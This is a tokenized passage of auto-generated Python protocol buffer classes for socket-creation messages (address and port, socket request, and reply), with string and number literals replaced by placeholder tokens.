<NUM_LIT:0> <EOL> has_packed_address_ = <NUM_LIT:0> <EOL> packed_address_ = "<STR_LIT>" <EOL> has_hostname_hint_ = <NUM_LIT:0> <EOL> hostname_hint_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def port ( self ) : return self . port_ <EOL> def set_port ( self , x ) : <EOL> self . has_port_ = <NUM_LIT:1> <EOL> self . port_ = x <EOL> def clear_port ( self ) : <EOL> if self . has_port_ : <EOL> self . has_port_ = <NUM_LIT:0> <EOL> self . port_ = <NUM_LIT:0> <EOL> def has_port ( self ) : return self . has_port_ <EOL> def packed_address ( self ) : return self . packed_address_ <EOL> def set_packed_address ( self , x ) : <EOL> self . has_packed_address_ = <NUM_LIT:1> <EOL> self . packed_address_ = x <EOL> def clear_packed_address ( self ) : <EOL> if self . has_packed_address_ : <EOL> self . has_packed_address_ = <NUM_LIT:0> <EOL> self . packed_address_ = "<STR_LIT>" <EOL> def has_packed_address ( self ) : return self . has_packed_address_ <EOL> def hostname_hint ( self ) : return self . hostname_hint_ <EOL> def set_hostname_hint ( self , x ) : <EOL> self . has_hostname_hint_ = <NUM_LIT:1> <EOL> self . hostname_hint_ = x <EOL> def clear_hostname_hint ( self ) : <EOL> if self . has_hostname_hint_ : <EOL> self . has_hostname_hint_ = <NUM_LIT:0> <EOL> self . hostname_hint_ = "<STR_LIT>" <EOL> def has_hostname_hint ( self ) : return self . has_hostname_hint_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_port ( ) ) : self . set_port ( x . port ( ) ) <EOL> if ( x . has_packed_address ( ) ) : self . set_packed_address ( x . packed_address ( ) ) <EOL> if ( x . has_hostname_hint ( ) ) : self . set_hostname_hint ( x . hostname_hint ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_port_ != x . has_port_ : return <NUM_LIT:0> <EOL> if self . has_port_ and self . port_ != x . port_ : return <NUM_LIT:0> <EOL> if self . has_packed_address_ != x . has_packed_address_ : return <NUM_LIT:0> <EOL> if self . has_packed_address_ and self . packed_address_ != x . packed_address_ : return <NUM_LIT:0> <EOL> if self . has_hostname_hint_ != x . has_hostname_hint_ : return <NUM_LIT:0> <EOL> if self . has_hostname_hint_ and self . hostname_hint_ != x . hostname_hint_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_port_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthVarInt64 ( self . port_ ) <EOL> if ( self . has_packed_address_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . packed_address_ ) ) <EOL> if ( self . has_hostname_hint_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . hostname_hint_ ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_port_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . port_ ) <EOL> if ( self . has_packed_address_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . packed_address_ ) ) <EOL> if ( self . has_hostname_hint_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . hostname_hint_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_port ( ) <EOL> self . clear_packed_address ( ) <EOL> self . clear_hostname_hint ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . port_ ) <EOL> if ( self . has_packed_address_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . packed_address_ ) <EOL> if ( self . has_hostname_hint_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . hostname_hint_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_port_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . port_ ) <EOL> if ( self . has_packed_address_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . packed_address_ ) <EOL> if ( self . has_hostname_hint_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . hostname_hint_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_port ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_packed_address ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_hostname_hint ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_port_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . port_ ) ) <EOL> if self . has_packed_address_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . packed_address_ ) ) <EOL> if self . has_hostname_hint_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . hostname_hint_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kport = <NUM_LIT:1> <EOL> kpacked_address = <NUM_LIT:2> <EOL> khostname_hint = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:port>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class CreateSocketRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> IPv4 = <NUM_LIT:1> <EOL> IPv6 = <NUM_LIT:2> <EOL> _SocketFamily_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } <EOL> def SocketFamily_Name ( cls , x ) : return cls . _SocketFamily_NAMES . get ( x , "<STR_LIT>" ) <EOL> SocketFamily_Name = classmethod ( SocketFamily_Name ) <EOL> TCP = <NUM_LIT:1> <EOL> UDP = <NUM_LIT:2> <EOL> _SocketProtocol_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } <EOL> def SocketProtocol_Name ( cls , x ) : return cls . _SocketProtocol_NAMES . get ( x , "<STR_LIT>" ) <EOL> SocketProtocol_Name = classmethod ( SocketProtocol_Name ) <EOL> has_family_ = <NUM_LIT:0> <EOL> family_ = <NUM_LIT:0> <EOL> has_protocol_ = <NUM_LIT:0> <EOL> protocol_ = <NUM_LIT:0> <EOL> has_proxy_external_ip_ = <NUM_LIT:0> <EOL> proxy_external_ip_ = None <EOL> has_listen_backlog_ = <NUM_LIT:0> <EOL> listen_backlog_ = <NUM_LIT:0> <EOL> has_remote_ip_ = <NUM_LIT:0> <EOL> remote_ip_ = None <EOL> has_app_id_ = <NUM_LIT:0> <EOL> app_id_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> self . socket_options_ = [ ] <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def family ( self ) : return self . family_ <EOL> def set_family ( self , x ) : <EOL> self . has_family_ = <NUM_LIT:1> <EOL> self . family_ = x <EOL> def clear_family ( self ) : <EOL> if self . has_family_ : <EOL> self . has_family_ = <NUM_LIT:0> <EOL> self . family_ = <NUM_LIT:0> <EOL> def has_family ( self ) : return self . has_family_ <EOL> def protocol ( self ) : return self . protocol_ <EOL> def set_protocol ( self , x ) : <EOL> self . has_protocol_ = <NUM_LIT:1> <EOL> self . protocol_ = x <EOL> def clear_protocol ( self ) : <EOL> if self . has_protocol_ : <EOL> self . has_protocol_ = <NUM_LIT:0> <EOL> self . protocol_ = <NUM_LIT:0> <EOL> def has_protocol ( self ) : return self . has_protocol_ <EOL> def socket_options_size ( self ) : return len ( self . socket_options_ ) <EOL> def socket_options_list ( self ) : return self . socket_options_ <EOL> def socket_options ( self , i ) : <EOL> return self . socket_options_ [ i ] <EOL> def mutable_socket_options ( self , i ) : <EOL> return self . socket_options_ [ i ] <EOL> def add_socket_options ( self ) : <EOL> x = SocketOption ( ) <EOL> self . socket_options_ . append ( x ) <EOL> return x <EOL> def clear_socket_options ( self ) : <EOL> self . socket_options_ = [ ] <EOL> def proxy_external_ip ( self ) : <EOL> if self . proxy_external_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . proxy_external_ip_ is None : self . proxy_external_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . proxy_external_ip_ <EOL> def mutable_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:1> ; return self . proxy_external_ip ( ) <EOL> def clear_proxy_external_ip ( self ) : <EOL> if self . has_proxy_external_ip_ : <EOL> self . has_proxy_external_ip_ = <NUM_LIT:0> ; <EOL> if self . proxy_external_ip_ is not None : self . proxy_external_ip_ . Clear ( ) <EOL> def has_proxy_external_ip ( self ) : return self . has_proxy_external_ip_ <EOL> def listen_backlog ( self ) : return self . listen_backlog_ <EOL> def set_listen_backlog ( self , x ) : <EOL> self . has_listen_backlog_ = <NUM_LIT:1> <EOL> self . listen_backlog_ = x <EOL> def clear_listen_backlog ( self ) : <EOL> if self . has_listen_backlog_ : <EOL> self . has_listen_backlog_ = <NUM_LIT:0> <EOL> self . listen_backlog_ = <NUM_LIT:0> <EOL> def has_listen_backlog ( self ) : return self . has_listen_backlog_ <EOL> def remote_ip ( self ) : <EOL> if self . remote_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . remote_ip_ is None : self . remote_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . remote_ip_ <EOL> def mutable_remote_ip ( self ) : self . has_remote_ip_ = <NUM_LIT:1> ; return self . remote_ip ( ) <EOL> def clear_remote_ip ( self ) : <EOL> if self . has_remote_ip_ : <EOL> self . has_remote_ip_ = <NUM_LIT:0> ; <EOL> if self . remote_ip_ is not None : self . remote_ip_ . Clear ( ) <EOL> def has_remote_ip ( self ) : return self . has_remote_ip_ <EOL> def app_id ( self ) : return self . app_id_ <EOL> def set_app_id ( self , x ) : <EOL> self . has_app_id_ = <NUM_LIT:1> <EOL> self . app_id_ = x <EOL> def clear_app_id ( self ) : <EOL> if self . has_app_id_ : <EOL> self . has_app_id_ = <NUM_LIT:0> <EOL> self . app_id_ = "<STR_LIT>" <EOL> def has_app_id ( self ) : return self . has_app_id_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_family ( ) ) : self . set_family ( x . family ( ) ) <EOL> if ( x . has_protocol ( ) ) : self . set_protocol ( x . protocol ( ) ) <EOL> for i in xrange ( x . socket_options_size ( ) ) : self . add_socket_options ( ) . CopyFrom ( x . socket_options ( i ) ) <EOL> if ( x . has_proxy_external_ip ( ) ) : self . mutable_proxy_external_ip ( ) . MergeFrom ( x . proxy_external_ip ( ) ) <EOL> if ( x . has_listen_backlog ( ) ) : self . set_listen_backlog ( x . listen_backlog ( ) ) <EOL> if ( x . has_remote_ip ( ) ) : self . mutable_remote_ip ( ) . MergeFrom ( x . remote_ip ( ) ) <EOL> if ( x . has_app_id ( ) ) : self . set_app_id ( x . app_id ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_family_ != x . has_family_ : return <NUM_LIT:0> <EOL> if self . has_family_ and self . family_ != x . family_ : return <NUM_LIT:0> <EOL> if self . has_protocol_ != x . has_protocol_ : return <NUM_LIT:0> <EOL> if self . has_protocol_ and self . protocol_ != x . protocol_ : return <NUM_LIT:0> <EOL> if len ( self . socket_options_ ) != len ( x . socket_options_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . socket_options_ , x . socket_options_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ != x . has_proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ and self . proxy_external_ip_ != x . proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_listen_backlog_ != x . has_listen_backlog_ : return <NUM_LIT:0> <EOL> if self . has_listen_backlog_ and self . listen_backlog_ != x . listen_backlog_ : return <NUM_LIT:0> <EOL> if self . has_remote_ip_ != x . has_remote_ip_ : return <NUM_LIT:0> <EOL> if self . has_remote_ip_ and self . remote_ip_ != x . remote_ip_ : return <NUM_LIT:0> <EOL> if self . has_app_id_ != x . has_app_id_ : return <NUM_LIT:0> <EOL> if self . has_app_id_ and self . app_id_ != x . app_id_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_family_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_protocol_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> for p in self . socket_options_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ and not self . proxy_external_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> if ( self . has_remote_ip_ and not self . remote_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthVarInt64 ( self . family_ ) <EOL> n += self . lengthVarInt64 ( self . protocol_ ) <EOL> n += <NUM_LIT:1> * len ( self . socket_options_ ) <EOL> for i in xrange ( len ( self . socket_options_ ) ) : n += self . lengthString ( self . socket_options_ [ i ] . ByteSize ( ) ) <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> if ( self . has_listen_backlog_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . listen_backlog_ ) <EOL> if ( self . has_remote_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . remote_ip_ . ByteSize ( ) ) <EOL> if ( self . has_app_id_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . app_id_ ) ) <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_family_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . family_ ) <EOL> if ( self . has_protocol_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . protocol_ ) <EOL> n += <NUM_LIT:1> * len ( self . socket_options_ ) <EOL> for i in xrange ( len ( self . socket_options_ ) ) : n += self . lengthString ( self . socket_options_ [ i ] . ByteSizePartial ( ) ) <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> if ( self . has_listen_backlog_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . listen_backlog_ ) <EOL> if ( self . has_remote_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . remote_ip_ . ByteSizePartial ( ) ) <EOL> if ( self . has_app_id_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . app_id_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_family ( ) <EOL> self . clear_protocol ( ) <EOL> self . clear_socket_options ( ) <EOL> self . clear_proxy_external_ip ( ) <EOL> self . clear_listen_backlog ( ) <EOL> self . clear_remote_ip ( ) <EOL> self . clear_app_id ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . family_ ) <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . protocol_ ) <EOL> for i in xrange ( len ( self . socket_options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . socket_options_ [ i ] . ByteSize ( ) ) <EOL> self . socket_options_ [ i ] . OutputUnchecked ( out ) <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> self . proxy_external_ip_ . OutputUnchecked ( out ) <EOL> if ( self . has_listen_backlog_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . listen_backlog_ ) <EOL> if ( self . has_remote_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:50> ) <EOL> out . putVarInt32 ( self . remote_ip_ . ByteSize ( ) ) <EOL> self . remote_ip_ . OutputUnchecked ( out ) <EOL> if ( self . has_app_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . app_id_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_family_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . family_ ) <EOL> if ( self . has_protocol_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . protocol_ ) <EOL> for i in xrange ( len ( self . socket_options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . socket_options_ [ i ] . ByteSizePartial ( ) ) <EOL> self . socket_options_ [ i ] . OutputPartial ( out ) <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> self . proxy_external_ip_ . OutputPartial ( out ) <EOL> if ( self . has_listen_backlog_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . listen_backlog_ ) <EOL> if ( self . has_remote_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:50> ) <EOL> out . putVarInt32 ( self . remote_ip_ . ByteSizePartial ( ) ) <EOL> self . remote_ip_ . OutputPartial ( out ) <EOL> if ( self . has_app_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . app_id_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_family ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_protocol ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_socket_options ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_proxy_external_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_listen_backlog ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:50> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_remote_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_app_id ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_family_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . family_ ) ) <EOL> if self . has_protocol_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . protocol_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . socket_options_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_proxy_external_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . proxy_external_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_listen_backlog_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . listen_backlog_ ) ) <EOL> if self . has_remote_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . remote_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_app_id_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . app_id_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kfamily = <NUM_LIT:1> <EOL> kprotocol = <NUM_LIT:2> <EOL> ksocket_options = <NUM_LIT:3> <EOL> kproxy_external_ip = <NUM_LIT:4> <EOL> klisten_backlog = <NUM_LIT:5> <EOL> kremote_ip = <NUM_LIT:6> <EOL> kapp_id = <NUM_LIT:9> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> } , <NUM_LIT:9> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:6> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:9> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:9> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class CreateSocketReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_server_address_ = <NUM_LIT:0> <EOL> server_address_ = None <EOL> has_proxy_external_ip_ = <NUM_LIT:0> <EOL> proxy_external_ip_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def server_address ( self ) : <EOL> if self . server_address_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . server_address_ is None : self . server_address_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . server_address_ <EOL> def mutable_server_address ( self ) : self . has_server_address_ = <NUM_LIT:1> ; return self . server_address ( ) <EOL> def clear_server_address ( self ) : <EOL> if self . has_server_address_ : <EOL> self . has_server_address_ = <NUM_LIT:0> ; <EOL> if self . server_address_ is not None : self . server_address_ . Clear ( ) <EOL> def has_server_address ( self ) : return self . has_server_address_ <EOL> def proxy_external_ip ( self ) : <EOL> if self . proxy_external_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . proxy_external_ip_ is None : self . proxy_external_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . proxy_external_ip_ <EOL> def mutable_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:1> ; return self . proxy_external_ip ( ) <EOL> def clear_proxy_external_ip ( self ) : <EOL> if self . has_proxy_external_ip_ : <EOL> self . has_proxy_external_ip_ = <NUM_LIT:0> ; <EOL> if self . proxy_external_ip_ is not None : self . proxy_external_ip_ . Clear ( ) <EOL> def has_proxy_external_ip ( self ) : return self . has_proxy_external_ip_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_server_address ( ) ) : self . mutable_server_address ( ) . MergeFrom ( x . server_address ( ) ) <EOL> if ( x . has_proxy_external_ip ( ) ) : self . mutable_proxy_external_ip ( ) . MergeFrom ( x . proxy_external_ip ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_server_address_ != x . has_server_address_ : return <NUM_LIT:0> <EOL> if self . has_server_address_ and self . server_address_ != x . server_address_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ != x . has_proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ and self . proxy_external_ip_ != x . proxy_external_ip_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_server_address_ and not self . server_address_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ and not self . proxy_external_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_server_address_ ) : n += <NUM_LIT:1> + self . lengthString ( self . server_address_ . ByteSize ( ) ) <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_server_address_ ) : n += <NUM_LIT:1> + self . lengthString ( self . server_address_ . ByteSizePartial ( ) ) <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . 